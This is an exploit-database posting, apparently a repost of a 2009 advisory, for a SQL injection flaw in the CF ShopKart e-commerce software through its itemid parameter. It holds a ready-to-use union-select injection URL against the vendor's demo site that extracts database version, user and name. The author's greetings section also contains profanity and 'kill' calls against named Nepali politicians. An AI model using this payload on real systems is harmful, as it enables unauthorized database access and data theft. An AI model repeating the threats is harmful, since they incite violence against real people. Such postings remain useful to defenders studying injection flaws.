[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

CF Shopkart 5.3x (itemid) Remote SQL Injection Vulnerability

Author
learn3r hacker
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5780
Category
web applications
Date add
16-09-2009
Platform
unsorted
============================================================
CF Shopkart 5.3x (itemid) Remote SQL Injection Vulnerability
============================================================


#####################################
#   CF ShopKart SQL vulnerability   #
#   By learn3r hacker from Nepal    #
#####################################

Product name: CF ShopKart
Version: 5.4 beta or may be lower
Product home: www.cfshopkart.com

Affected variable: item

SQLi examples:
http://demo.cfshopkart.com/index.cfm?carttoken=E48384J091709064002&action=ViewDetails&itemid=-928+union+all+select+concat(@@version,user(),database()),2--+

Note that the results of second query are seen in the <title> tag...


Greetz to: sToRm and m0nkee from #gny, sam207 from www.sampctricks.blogspot.com, nepali boka, l@d0_put! HaCKeR and all...
FuCK MaKuNe, G!r!ja, Prachanda and all political leaders of Nepal
K!ll Parmananda Jha, Upendra Yadav and Vijay Gachhedhaar

By learn3r aka cyb3r lord
Nepali Hackerz Are Not Dead!!!



#  0day.today [2024-12-26]  #